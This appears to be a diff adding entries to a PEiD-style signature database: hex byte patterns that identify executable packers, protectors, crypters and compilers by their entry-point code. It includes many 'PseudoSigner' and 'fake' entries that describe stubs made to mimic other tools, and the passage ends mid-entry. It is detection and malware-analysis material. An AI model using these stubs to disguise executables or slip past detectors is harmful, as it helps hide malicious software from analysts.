+[* PseudoSigner 0.1 [Microsoft Visual C++ 6.20] --> Anorganix]
+signature = 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 55 8B EC 83 EC 50 53 56 57 BE 90 90 90 90 8D 7D F4 A5 A5 66 A5 8B
+ep_only = true
+
+[* PseudoSigner 0.1 [Microsoft Visual C++ 7.0 DLL] --> Anorganix]
+signature = 55 8D 6C 01 00 81 EC 00 00 00 00 8B 45 90 83 F8 01 56 0F 84 00 00 00 00 85 C0 0F 84 ?? ?? ?? ?? E9
+ep_only = true
+
+[* PseudoSigner 0.1 [MinGW GCC 2.x] --> Anorganix]
+signature = 55 89 E5 E8 02 00 00 00 C9 C3 90 90 45 58 45 E9
+ep_only = true
+
+[* PseudoSigner 0.1 [Morphine 1.2] --> Anorganix]
+signature = 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 EB 06 00 90 90 90 90 90 90 90 90 EB 08 E8 90 00 00 00 66 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 51 66 90 90 90 59 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
+ep_only = true
+
+[* PseudoSigner 0.1 [Neolite 2.0] --> Anorganix]
+signature = E9 A6 00 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
+ep_only = true
+
+[* PseudoSigner 0.1 [NorthStar PE Shrinker 1.3] --> Anorganix]
+signature = 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 2B E8 8D B5 00 00 00 00 E9
+ep_only = true
+
+[* PseudoSigner 0.1 [Pack Master 1.0 (PEX Clone)] --> Anorganix]
+signature = 60 E8 01 01 00 00 E8 83 C4 04 E8 01 90 90 90 E9 5D 81 ED D3 22 40 90 E8 04 02 90 90 E8 EB 08 EB 02 CD 20 FF 24 24 9A 66 BE 47 46 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
+ep_only = true
+
+[* PseudoSigner 0.1 [PE Intro 1.0] --> Anorganix]
+signature = 8B 04 24 9C 60 E8 14 00 00 00 5D 81 ED 0A 45 40 90 80 BD 67 44 40 90 90 0F 85 48 FF ED 0A E9
+ep_only = true
+
+[* PseudoSigner 0.1 [PE Pack 0.99] --> Anorganix]
+signature = 60 E8 11 00 00 00 5D 83 ED 06 80 BD E0 04 90 90 01 0F 84 F2 FF CC 0A E9
+ep_only = true
+
+[* PseudoSigner 0.1 [PE Protect 0.9] --> Anorganix]
+signature = 52 51 55 57 64 67 A1 30 00 85 C0 78 0D E8 07 00 00 00 58 83 C0 07 C6 90 C3 E9
+ep_only = true
+
+[* PseudoSigner 0.1 [PECompact 1.4+] --> Anorganix]
+signature = 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 EB 06 68 90 90 90 90 C3 9C 60 E8 02 90 90 90 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81
+ep_only = true
+
+[* PseudoSigner 0.1 [PENightMare 2 Beta] --> Anorganix]
+signature = 60 E9 10 00 00 00 EF 40 03 A7 07 8F 07 1C 37 5D 43 A7 04 B9 2C 3A E9
+ep_only = true
+
+[* PseudoSigner 0.1 [PENinja 1.31] --> Anorganix]
+signature = 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 E9
+ep_only = true
+
+[* PseudoSigner 0.1 [PESHiELD 0.25] --> Anorganix]
+signature = 60 E8 2B 00 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 CC CC E9
+ep_only = true
+
+[* PseudoSigner 0.1 [PEtite 2.x (level 0)] --> Anorganix]
+signature = 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 B8 00 90 90 00 6A 00 68 90 90 90 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 8B D8 03 00 68
+ep_only = true
+
+[* PseudoSigner 0.1 [PEX 0.99] --> Anorganix]
+signature = 60 E8 01 00 00 00 55 83 C4 04 E8 01 00 00 00 90 5D 81 FF FF FF 00 01 E9
+ep_only = true
+
+[* PseudoSigner 0.1 [REALBasic] --> Anorganix]
+signature = 55 89 E5 90 90 90 90 90 90 90 90 90 90 50 90 90 90 90 90 00 01 E9
+ep_only = true
+
+[* PseudoSigner 0.1 [Ste@lth PE 1.01] --> Anorganix]
+signature = 0B C0 0B C0 0B C0 0B C0 0B C0 0B C0 0B C0 0B C0 BA ?? ?? ?? ?? FF E2 BA E0 10 40 00 B8 68 24 1A 40 89 02 83 C2 03 B8 40 00 E8 EE 89 02 83 C2 FD FF E2 2D 3D 5B 20 48 69 64 65 50 45 20 5D 3D 2D 90 00 00 00
+ep_only = true
+
+[* PseudoSigner 0.1 [UPX 0.6] --> Anorganix]
+signature = 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 8D B0 E8 00 00 00 E9
+ep_only = true
+
+[* PseudoSigner 0.1 [VBOX 4.3 MTE] --> Anorganix]
+signature = 0B C0 0B C0 0B C0 0B C0 0B C0 0B C0 0B C0 0B C0 E9
+ep_only = true
+
+[* PseudoSigner 0.1 [Video-Lan-Client] --> Anorganix]
+signature = 55 89 E5 83 EC 08 90 90 90 90 90 90 90 90 90 90 90 90 90 90 01 FF FF 01 01 01 00 01 90 90 90 90 90 90 90 90 90 90 90 90 90 90 00 01 00 01 00 01 90 90 00 01 E9
+ep_only = true
+
+[* PseudoSigner 0.1 [VOB ProtectCD 5] --> Anorganix]
+signature = 36 3E 26 8A C0 60 E8 00 00 00 00 E9
+ep_only = true
+
+[* PseudoSigner 0.1 [WATCOM C/C++ EXE] --> Anorganix]
+signature = E9 00 00 00 00 90 90 90 90 57 41 E9
+ep_only = true
+
+[* PseudoSigner 0.1 [XCR 0.11] --> Anorganix]
+signature = 60 8B F0 33 DB 83 C3 01 83 C0 01 E9
+ep_only = true
+
+[* PseudoSigner 0.1 [Yoda's Protector 1.02] --> Anorganix]
+signature = E8 03 00 00 00 EB 01 90 90 E9
+ep_only = true
+
+[* PseudoSigner 0.2 [.BJFNT 1.1b] --> Anorganix]
+signature = EB 01 EA 9C EB 01 EA 53 EB 01 EA 51 EB 01 EA 52 EB 01 EA 56 90
+ep_only = true
+
+[* PseudoSigner 0.2 [.BJFNT 1.2] --> Anorganix]
+signature = EB 02 69 B1 83 EC 04 EB 03 CD 20 EB EB 01 EB 9C EB 01 EB EB 00
+ep_only = true
+
+[* PseudoSigner 0.2 [32Lite 0.03] --> Anorganix]
+signature = 60 06 FC 1E 07 BE 90 90 90 90 6A 04 68 90 10 90 90 68
+ep_only = true
+
+[* PseudoSigner 0.2 [Armadillo 3.00] --> Anorganix]
+signature = 60 E8 2A 00 00 00 5D 50 51 EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC E9 59 58 50 51 EB 85
+ep_only = true
+
+[* PseudoSigner 0.2 [ASProtect] --> Anorganix]
+signature = 60 90 90 90 90 90 90 5D 90 90 90 90 90 90 90 90 90 90 90 03 DD
+ep_only = true
+
+[* PseudoSigner 0.2 [Borland C++ 1999] --> Anorganix]
+signature = EB 10 66 62 3A 43 2B 2B 48 4F 4F 4B 90 E9 90 90 90 90 A1 ?? ?? ?? ?? A3
+ep_only = true
+
+[* PseudoSigner 0.2 [Borland C++ DLL (Method 2)] --> Anorganix]
+signature = EB 10 66 62 3A 43 2B 2B 48 4F 4F 4B 90 E9 90 90 90 90
+ep_only = true
+
+[* PseudoSigner 0.2 [Borland Delphi DLL] --> Anorganix]
+signature = 55 8B EC 83 C4 B4 B8 90 90 90 90 E8 00 00 00 00 E8 00 00 00 00 8D 40 00
+ep_only = true
+
+[* PseudoSigner 0.2 [Borland Delphi Setup Module] --> Anorganix]
+signature = 55 8B EC 83 C4 90 53 56 57 33 C0 89 45 F0 89 45 D4 89 45 D0 E8 00 00 00 00
+ep_only = true
+
+[* PseudoSigner 0.2 [CD-Cops II] --> Anorganix]
+signature = 53 60 BD 90 90 90 90 8D 45 90 8D 5D 90 E8 00 00 00 00 8D 01
+ep_only = true
+
+[* PseudoSigner 0.2 [Code-Lock] --> Anorganix]
+signature = 43 4F 44 45 2D 4C 4F 43 4B 2E 4F 43 58 00 01 28 01 50 4B 47 05 4C 3F B4 04 4D 4C 47 4B
+ep_only = true
+
+[* PseudoSigner 0.2 [CodeSafe 2.0] --> Anorganix]
+signature = 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 EB 0B 83 EC 10 53 56 57 E8 C4 01 00 85
+ep_only = true
+
+[* PseudoSigner 0.2 [Crunch/PE Heuristic] --> Anorganix]
+signature = 55 E8 0E 00 00 00 5D 83 ED 06 8B C5 55 60 89 AD ?? ?? ?? ?? 2B 85 00 00 00 00
+ep_only = true
+
+[* PseudoSigner 0.2 [DEF 1.0] --> Anorganix]
+signature = BE 00 01 40 00 6A 05 59 80 7E 07 00 74 11 8B 46 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 83 C1 01
+ep_only = true
+
+[* PseudoSigner 0.2 [DxPack 1.0] --> Anorganix]
+signature = 60 E8 00 00 00 00 5D 8B FD 81 ED 90 90 90 90 2B B9 00 00 00 00 81 EF 90 90 90 90 83 BD 90 90 90 90 90 0F 84 00 00 00 00
+ep_only = true
+
+[* PseudoSigner 0.2 [ExeSmasher] --> Anorganix]
+signature = 9C FE 03 90 60 BE 90 90 41 90 8D BE 90 10 FF FF 57 83 CD FF EB 10 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 FE 0B
+ep_only = true
+
+[* PseudoSigner 0.2 [FSG 1.0] --> Anorganix]
+signature = 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 BB D0 01 40 00 BF 00 10 40 00 BE 90 90 90 90 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 FC B2 80 A4 6A 02 5B
+ep_only = true
+
+[* PseudoSigner 0.2 [FSG 1.31] --> Anorganix]
+signature = BE 90 90 90 00 BF 90 90 90 00 BB 90 90 90 00 53 BB 90 90 90 00 B2 80
+ep_only = true
+
+[* PseudoSigner 0.2 [Gleam 1.00] --> Anorganix]
+signature = 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 EB 0B 83 EC 0C 53 56 57 E8 24 02 00 FF
+ep_only = true
+
+[* PseudoSigner 0.2 [JDPack 1.x / JDProtect 0.9] --> Anorganix]
+signature = 60 E8 22 00 00 00 5D 8B D5 81 ED 90 90 90 90 2B 95 90 90 90 90 81 EA 06 90 90 90 89 95 90 90 90 90 83 BD 45 00 01 00 01
+ep_only = true
+
+[* PseudoSigner 0.2 [LCC Win32 1.x] --> Anorganix]
+signature = 64 A1 01 00 00 00 55 89 E5 6A FF 68 ?? ?? ?? ?? 68 9A 10 40 90 50
+ep_only = true
+
+[* PseudoSigner 0.2 [LCC Win32 DLL] --> Anorganix]
+signature = 55 89 E5 53 56 57 83 7D 0C 01 75 05 E8 17 90 90 90 FF 75 10 FF 75 0C FF 75 08 A1
+ep_only = true
+
+[* PseudoSigner 0.2 [Lockless Intro Pack] --> Anorganix]
+signature = 2C E8 EB 1A 90 90 5D 8B C5 81 ED F6 73 90 90 2B 85 90 90 90 90 83 E8 06 89 85 FF 01 EC AD
+ep_only = true
+
+[* PseudoSigner 0.2 [Macromedia Flash Projector 6.0] --> Anorganix]
+signature = 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 83 EC 44 56 FF 15 24 81 49 00 8B F0 8A 06 3C 22 75 1C 8A 46 01 46 3C 22 74 0C 84 C0 74 08 8A 46 01 46 3C 22 75 F4 80 3E 22 75 0F 46 EB 0C
+ep_only = true
+
+[* PseudoSigner 0.2 [MEW 11 SE 1.0] --> Anorganix]
+signature = E9 09 00 00 00 00 00 00 02 00 00 00 0C 90
+ep_only = true
+
+[* PseudoSigner 0.2 [Microsoft Visual Basic 5.0 - 6.0] --> Anorganix]
+signature = 68 ?? ?? ?? ?? E8 0A 00 00 00 00 00 00 00 00 00 30 00 00 00
+ep_only = true
+
+[* PseudoSigner 0.2 [Microsoft Visual C++ 7.0 DLL] --> Anorganix]
+signature = 55 8D 6C 01 00 81 EC 00 00 00 00 8B 45 90 83 F8 01 56 0F 84 00 00 00 00 85 C0 0F 84
+ep_only = true
+
+[* PseudoSigner 0.2 [MinGW GCC 2.x] --> Anorganix]
+signature = 55 89 E5 E8 02 00 00 00 C9 C3 90 90 45 58 45
+ep_only = true
+
+[* PseudoSigner 0.2 [NorthStar PE Shrinker 1.3] --> Anorganix]
+signature = 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 2B E8 8D B5 00 00 00 00
+ep_only = true
+
+[* PseudoSigner 0.2 [PE Intro 1.0] --> Anorganix]
+signature = 8B 04 24 9C 60 E8 14 00 00 00 5D 81 ED 0A 45 40 90 80 BD 67 44 40 90 90 0F 85 48 FF ED 0A
+ep_only = true
+
+[* PseudoSigner 0.2 [PE Pack 0.99] --> Anorganix]
+signature = 60 E8 11 00 00 00 5D 83 ED 06 80 BD E0 04 90 90 01 0F 84 F2 FF CC 0A
+ep_only = true
+
+[* PseudoSigner 0.2 [PE Protect 0.9] --> Anorganix]
+signature = 52 51 55 57 64 67 A1 30 00 85 C0 78 0D E8 07 00 00 00 58 83 C0 07 C6 90 C3
+ep_only = true
+
+[* PseudoSigner 0.2 [PENightMare 2 Beta] --> Anorganix]
+signature = 60 E9 10 00 00 00 EF 40 03 A7 07 8F 07 1C 37 5D 43 A7 04 B9 2C 3A
+ep_only = true
+
+[* PseudoSigner 0.2 [PESHiELD 0.25] --> Anorganix]
+signature = 60 E8 2B 00 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 CC CC
+ep_only = true
+
+[* PseudoSigner 0.2 [PEX 0.99] --> Anorganix]
+signature = 60 E8 01 00 00 00 55 83 C4 04 E8 01 00 00 00 90 5D 81 FF FF FF 00 01
+ep_only = true
+
+[* PseudoSigner 0.2 [REALBasic] --> Anorganix]
+signature = 55 89 E5 90 90 90 90 90 90 90 90 90 90 50 90 90 90 90 90 00 01
+ep_only = true
+
+[* PseudoSigner 0.2 [UPX 0.6] --> Anorganix]
+signature = 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 8D B0 E8 00 00 00
+ep_only = true
+
+[* PseudoSigner 0.2 [VBOX 4.3 MTE] --> Anorganix]
+signature = 0B C0 0B C0 0B C0 0B C0 0B C0 0B C0 0B C0 0B C0
+ep_only = true
+
+[* PseudoSigner 0.2 [Video-Lan-Client] --> Anorganix]
+signature = 55 89 E5 83 EC 08 90 90 90 90 90 90 90 90 90 90 90 90 90 90 01 FF FF 01 01 01 00 01 90 90 90 90 90 90 90 90 90 90 90 90 90 90 00 01 00 01 00 01 90 90 00 01
+ep_only = true
+
+[* PseudoSigner 0.2 [VOB ProtectCD 5] --> Anorganix]
+signature = 36 3E 26 8A C0 60 E8 00 00 00 00
+ep_only = true
+
+[* PseudoSigner 0.2 [Watcom C/C++ DLL] --> Anorganix]
+signature = 53 56 57 55 8B 74 24 14 8B 7C 24 18 8B 6C 24 1C 83 FF 03 0F 87 01 00 00 00 F1
+ep_only = true
+
+[* PseudoSigner 0.2 [WATCOM C/C++ EXE] --> Anorganix]
+signature = E9 00 00 00 00 90 90 90 90 57 41
+ep_only = true
+
+[* PseudoSigner 0.2 [XCR 0.11] --> Anorganix]
+signature = 60 8B F0 33 DB 83 C3 01 83 C0 01
+ep_only = true
+
+[* PseudoSigner 0.2 [Yoda's Protector 1.02] --> Anorganix]
+signature = E8 03 00 00 00 EB 01 90 90
+ep_only = true
+
+[* PseudoSigner 0.2 [ZCode 1.01] --> Anorganix]
+signature = E9 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E9 FB FF FF FF C3 68 00 00 00 00 64 FF 35 00 00 00 00
+ep_only = true
+
+[* [MSLRH] v0.1 -> emadicius]
+signature = 60 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 E8 0A 00 00 00 E8 EB 0C 00 00 E8
+ep_only = false
+
+[* [MSLRH] V0.31 -> emadicius]
+signature = 60 D1 CB 0F CA C1 CA E0 D1 CA 0F C8 EB 01 F1
+ep_only = true
+
+[* [MSLRH] v0.31a]
+signature = 60 D1 CB 0F CA C1 CA E0 D1 CA 0F C8 EB 01 F1 0F C0 C9 D2 D1 0F C1 C0 D3 DA C0 D6 A8 EB 01 DE D0 EC 0F C1 CB D0 CF 0F C1 D1 D2 DB 0F C8 EB 01 BC C0 E9 C6 C1 D0 91 0F CB EB 01 73 0F CA 87 D9 87 D2 D0 CF 87 D9 0F C8 EB 01 C1 EB 01 A2 86 CA D0 E1 0F C0 CB 0F
+ep_only = false
+
+[* [MSLRH] v0.32a -> emadicius]
+signature = E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01 81 83 C4 04 E8 0A 00 00 00 E8
+ep_only = false
+
+[* [MSLRH] v0.32a -> emadicius]
+signature = EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03
+ep_only = false
+
+[*** Protector v1.1.11 (DDeM->PE Engine v0.9, DDeM->CI v0.9.2)]
+signature = 53 51 56 E8 00 00 00 00 5B 81 EB 08 10 00 00 8D B3 34 10 00 00 B9 F3 03 00 00 BA 63 17 2A EE 31 16 83 C6 04
+ep_only = true
+
+[.BJFnt v1.1b]
+signature = EB 01 EA 9C EB 01 EA 53 EB 01 EA 51 EB 01 EA 52 EB 01 EA 56
+ep_only = true
+
+[.BJFnt v1.2 RC]
+signature = EB 02 69 B1 83 EC 04 EB 03 CD 20 EB EB 01 EB 9C EB 01 EB EB
+ep_only = true
+
+[.BJFnt v1.3]
+signature = EB ?? 3A ?? ?? 1E EB ?? CD 20 9C EB ?? CD 20 EB ?? CD 20 60 EB
+ep_only = true
+
+[.NET DLL -> Microsoft]
+signature = 00 00 00 00 00 00 00 00 5F 43 6F 72 44 6C 6C 4D 61 69 6E 00 6D 73 63 6F 72 65 65 2E 64 6C 6C 00 00 ?? 00 00 FF 25
+ep_only = false
+
+[.NET executable -> Microsoft]
+signature = 00 00 00 00 00 00 00 00 5F 43 6F 72 45 78 65 4D 61 69 6E 00 6D 73 63 6F 72 65 65 2E 64 6C 6C 00 00 00 00 00 FF 25
+ep_only = false
+
+[32Lite v0.03a]
+signature = 60 06 FC 1E 07 BE ?? ?? ?? ?? 6A 04 68 ?? 10 ?? ?? 68
+ep_only = true
+
+[624 (Six to Four) v1.0]
+signature = 50 55 4C 50 83 ?? ?? FC BF ?? ?? BE ?? ?? B5 ?? 57 F3 A5 C3 33 ED
+ep_only = true
+
+[Aase Crypter - by santasdad]
+signature = 55 8B EC 83 C4 F0 53 B8 A0 3E 00 10 E8 93 DE FF FF 68 F8 42 00 10 E8 79 DF FF FF 68 00 43 00 10 68 0C 43 00 10 E8 42 DF FF FF 50 E8 44 DF FF FF A3 98 66 00 10 83 3D 98 66 00 10 00 75 13 6A 00 68 18 43 00 10 68 1C 43 00 10 6A 00 E8 4B DF FF FF 68 2C 43 00 10 68 0C 43 ?? ?? ?? ?? DF FF FF 50 E8 0E DF FF FF A3 94 66 00 10 83 3D 94 66 00 10 00 75 13 6A 00 68 18 43 00 10 68 38 43 00 10 6A 00 E8 15 DF FF FF 68 48 43 00 10 68 0C 43 00 10 E8 D6 DE FF FF 50 E8 D8 DE FF FF A3 A0 66 00 10 83 3D A0 66 00 10 00 75 13 6A 00 68 18 43 00 10 68 58 43 00 10 6A 00 E8 DF DE FF FF 68 6C 43 00 10 68 0C 43 00 10 E8 A0 DE FF FF 50 E8 A2 DE FF FF
+ep_only = false
+
+[ABC Cryptor 1.0 - by ZloY]
+signature = 68 FF 64 24 F0 68 58 58 58 58 90 FF D4 50 8B 40 F2 05 B0 95 F6 95 0F 85 01 81 BB FF 68 ?? ?? ?? ?? BF 00 ?? ?? ?? B9 00 ?? ?? ?? 80 37 ?? 47 39 CF 75 F8 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? BF 00 ?? ?? ?? B9 00 ?? ?? ?? 80 37 ?? 47 39 CF 75 F8
+ep_only = false
+
+[AcidCrypt]
+signature = 60 B9 ?? ?? ?? 00 BA ?? ?? ?? 00 BE ?? ?? ?? 00 02 38 40 4E 75 FA 8B C2 8A 18 32 DF C0 CB
+ep_only = true
+
+[AcidCrypt]
+signature = BE ?? ?? ?? ?? 02 38 40 4E 75 FA 8B C2 8A 18 32 DF C0 CB
+ep_only = true
+
+[ACProtect 1.09g -> Risco software Inc.]
+signature = 60 F9 50 E8 01 00 00 00 7C 58 58 49 50 E8 01 00 00 00 7E 58 58 79 04 66 B9 B8 72 E8 01 00 00 00 7A 83 C4 04 85 C8 EB 01 EB C1 F8 BE 72 03 73 01 74 0F 81 01 00 00 00 F9 EB 01 75 F9 E8 01 00 00
+ep_only = true
+
+[ACProtect 1.4x -> RISCO soft]
+signature = 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 00 00 00 4D 65 73 73 61 67 65 42 6F 78 41 00 90 4D 69 6E 65 49 6D 70
+ep_only = false
+
+[ACProtect v1.35 -> risco software Inc. & Anticrack Software]
+signature = 4B 45 52 4E 45 4C 33 32 2E 44 4C 4C 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 55 53 45 52 33 32 2E 44 4C 4C 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 47 65 74 50 72 6F 63
+ep_only = false
+
+[ACProtect V1.3X -> risco]
+signature = 60 50 E8 01 00 00 00 75 83
+ep_only = true
+
+[ACProtect v1.41]
+signature = 60 76 03 77 01 7B 74 03 75 01 78 47 87 EE E8 01 00 00 00 76 83 C4 04 85 EE EB 01 7F 85 F2 EB 01 79 0F 86 01 00 00 00 FC EB 01 78 79 02 87 F2 61 51 8F 05 19 38 01 01 60 EB 01 E9 E9 01 00 00 00
+ep_only = true
+
+[ACProtect V1.4X -> risco]
+signature = 60 E8 01 00 00 00 7C 83 04 24 06 C3
+ep_only = true
+
+[ACProtect v1.90g -> Risco software Inc.]
+signature = 60 0F 87 02 00 00 00 1B F8 E8 01 00 00 00 73 83 04 24 06 C3
+ep_only = true
+
+[ACProtect V2.0 -> risco]
+signature = 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? C3 C3
+ep_only = true
+
+[ACProtect/UltraProtect 1.0X-2.0X -> RiSco]
+signature = 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 44 4C 4C 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 55 53 45 52 33 32 2E 44 4C 4C 00 ?? ?? ?? ?? 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 00 00 00 4D 65 73 73 61 67 65 42 6F 78 41 00 90 4D 69 6E 65 49 6D 70 6F 72 74 5F 45 6E 64 73 73 00
+ep_only = false
+
+[ActiveMARK 5.x -> Trymedia Systems,Inc.]
+signature = 20 2D 2D 4D 50 52 4D 4D 47 56 41 2D 2D 00 75 73 65 72 33 32 2E 64 6C 6C 00 4D 65 73 73 61 67 65 42 6F 78 41 00 54 68 69 73 20 61 70 70 6C 69 63 61 74 69 6F 6E 20 63 61 6E 6E 6F 74 20 72 75 6E 20 77 69 74 68 20 61 6E 20 61 63 74 69 76 65 20 64 65 62 75 67
+ep_only = false
+
+[ActiveMARK[TM] R5.31.1140 -> Trymedia]
+signature = 79 11 7F AB 9A 4A 83 B5 C9 6B 1A 48 F9 27 B4 25
+ep_only = true
+
+[AdFlt2]
+signature = 68 00 01 9C 0F A0 0F A8 60 FD 6A 00 0F A1 BE ?? ?? AD
+ep_only = true
+
+[Ady's Glue 1.10]
+signature = 2E ?? ?? ?? ?? 0E 1F BF ?? ?? 33 DB 33 C0 AC
+ep_only = true
+
+[Ady`s Glue v0.10]
+signature = 2E 8C 06 ?? ?? 0E 07 33 C0 8E D8 BE ?? ?? BF ?? ?? FC B9 ?? ?? 56 F3 A5 1E 07 5F
+ep_only = true
+
+[AHPack 0.1 -> FEUERRADER]
+signature = 60 68 54 ?? ?? 00 B8 48 ?? ?? 00 FF 10 68 B3 ?? ?? 00 50 B8 44 ?? ?? 00 FF 10 68 00
+ep_only = true
+
+[AHpack 0.1 -> FEUERRADER]
+signature = 60 68 54 ?? ?? ?? B8 48 ?? ?? ?? FF 10 68 B3 ?? ?? ?? 50 B8 44 ?? ?? ?? FF 10 68 00 ?? ?? ?? 6A 40 FF D0 89 05 CA ?? ?? ?? 89 C7 BE 00 10 ?? ?? 60 FC B2 80 31 DB A4 B3 02 E8 6D 00 00 00 73 F6 31 C9 E8 64 00 00 00 73 1C 31 C0 E8 5B 00 00 00 73 23 B3 02 41
+ep_only = true
+
+[AHTeam EP Protector 0.3 (fake ASPack 2.12) -> FEUERRADER]
+signature = 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB
+ep_only = true
+
+[AHTeam EP Protector 0.3 (fake ASProtect 1.0) -> FEUERRADER]
+signature = 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 60 E8 01 00 00 00 90 5D 81 ED 00 00 00 00 BB 00 00 00 00 03 DD 2B 9D
+ep_only = true
+
+[AHTeam EP Protector 0.3 (fake Borland Delphi 6.0-7.0) -> FEUERRADER]
+signature = 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 53 8B D8 33 C0 A3 00 00 00 00 6A 00 E8 00 00 00 FF A3 00 00 00 00 A1 00 00 00 00 A3 00 00 00 00 33 C0 A3 00 00 00 00 33 C0 A3 00 00 00 00 E8
+ep_only = true
+
+[AHTeam EP Protector 0.3 (fake k.kryptor 9/kryptor a) -> FEUERRADER]
